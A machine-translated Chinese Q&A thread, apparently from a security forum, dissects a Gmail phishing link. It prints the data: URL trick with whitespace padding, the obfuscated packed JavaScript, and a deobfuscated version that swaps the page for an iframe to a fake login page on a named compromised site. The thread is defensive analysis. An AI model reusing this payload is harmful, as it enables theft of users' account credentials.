我收到一封電子郵件從一個附加文件同事這似乎是在谷歌驅動器,一旦點擊它導致了下面的網址,它再現了谷歌帳戶登錄頁面,以竊取密碼:這是一個谷歌賬戶黑客?
從腳本中可以找到發送信息的地方,如果我把我的電子郵件地址和密碼?
我收到一封電子郵件從一個附加文件同事這似乎是在谷歌驅動器,一旦點擊它導致了下面的網址,它再現了谷歌帳戶登錄頁面,以竊取密碼:這是一個谷歌賬戶黑客?
從腳本中可以找到發送信息的地方,如果我把我的電子郵件地址和密碼?
如果你想檢查點擊此鏈接後有多少網址正在工作。
安裝Temple數據附加組件在您的瀏覽器中。打開它並點擊此鏈接。你會看到很多鏈接。
找出它的最好方法是,當它提示你輸入你的憑證時,檢查你實際在哪個域。如果它是谷歌域,那麼它的確定,如果沒有,那麼它的東西與釣魚有關。
在這裏你應該非常小心地檢查域名,攻擊者發揮一個竅門,如果域名是谷歌他們創建非常類似的東西像gooogle或geogle的東西。所以仔細檢查域名。
讓我們打破了攻擊,據我們可以:
這是一個網址,出發的基本Gmail登錄鏈接,設置了幾個請求變量如果可以自動登錄。
data:text/html,https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue
接下來是大量的空白空間,旨在隱藏瀏覽器地址欄中的惡意負載。
%20%20%20%20%20%20%20%20%20%20%20%
(等)
現在接着對受害者的有效負載。它是base64編碼的。
當我們對其進行解碼,它看起來像這樣:
eval(function (p, a, c, k, e, d)
{
e = function (c)
{
return c
};
if (!''.replace(/^/, String))
{
while (c--)
{
d[c] = k[c] || c
}
k = [function (e)
{
return d[e]
}
];
e = function()
{
return '\\w+'
};
c = 1
};
while (c--)
{
if (k[c])
{
p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
}
}
return p
}
('3.2.16="15 14 13 17 18";21{(20(){19 1=3.2.12(\'1\');1.10=\'7/8-6\';1.11=\'9 6\';1.22=\'\';2.31(\'34\')[0].23(1)}())}33(35){}3.2.36.37="<4 39=\\"38://32.26/25-24/\\" 27=\\"28: 0;30: 5%;29:5%\\"></4>";', 10, 40, '|link|document|window|iframe|100|icon|image|x|shortcut|type|rel|createElement|been|have|You|title|Signed|out|var|function|try|href|appendChild|content|wp|club|style|border|height|width|getElementsByTagName|bluevoicepgh|catch|head|e|body|outerHTML|http|src'.split('|'), 0, {}
))
這是邪,模糊JavaScript。不要執行它。
martinstoeckli的回答包含此腳本的擴展版本。
它設置您當前標籤的標題來模仿gMail的'您已經被註銷'頁面,並且改變頁面,添加一個沒有邊框的屏幕填充iframe。
iFrame指向(似乎是)受損的WordPress網站,其中包含僞造的Gmail登錄頁面。 將憑據輸入到bluevoicepgh.club
(有人可能想通知這些人他們的wordpress網站可能已被盜用)託管的虛假頁面中,然後將您重定向到已在後臺默默登錄您的gmail頁面。無論您輸入假登錄頁面的憑據是否正確,都會發生這種情況。
如果您確實在該頁面中輸入了有效的憑證,那麼除非您可以查看其後面的腳本,否則不會告訴它該去哪裏。
請記住,(謝天謝地)目前的形式,攻擊將不會正常,因爲谷歌的登錄頁面使用HTTPS(和強制使用HTTPS)工作。 鉻提醒我們在執行腳本:
Mixed Content: The page at 'https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false…9keXxvdXRlckhUTUx8aHR0cHxzcmMnLnNwbGl0KCd8JyksMCx7fSkpCg==%3E%3C/script%3E' was loaded over HTTPS, but requested an insecure resource 'http://bluevoicepgh.club/wp-content/'. This request has been blocked; the content must be served over HTTPS.
對於那些他們就粘貼到自己的瀏覽器後,誰想知道。它的_safe_現在:)。該域是**關閉**,它不會工作。 – Reyo
腳本無法正常工作,因爲谷歌是在發送x-frame-options = deny
(它是在瀏覽器中尊重這一頭),但鏈接的意圖似乎像這樣:
%20
是空白,這樣一個人希望隱藏URL的內容,因爲下面的內容可能不在可見區域。也許有人想分析這個框架,但應該小心謹慎地做,惡意的域名是bluevoicepgh。
window.document.title = "You have been Signed out";
try {
(function() {
var link = window.document.createElement('link');
link.type = 'image/x-icon';
link.rel = 'shortcut icon';
link.href = '';
document.getElementsByTagName('head')[0].appendChild(link)
}())
} catch (e) {}
window.document.body.outerHTML = "<iframe src=\"http://!!maliciousdomain!!.club/wp-content/\" style=\"border: 0;width: 100%;height:100%\"></iframe>";
只是爲了完整性解碼腳本部分:http://pastebin.com/0ZK3s2L1 – Andreas